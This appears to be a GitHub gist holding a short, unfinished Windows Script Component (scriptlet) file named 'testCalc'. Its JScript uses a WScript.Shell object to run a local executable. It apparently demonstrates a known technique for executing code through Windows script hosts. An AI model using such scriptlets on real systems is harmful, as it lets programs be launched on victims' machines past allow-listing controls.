Skip to content

Instantly share code, notes, and snippets.

View negativelol's full-sized avatar

negativ negativelol

View GitHub Profile
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cscwserv.exe");
]]>
</script>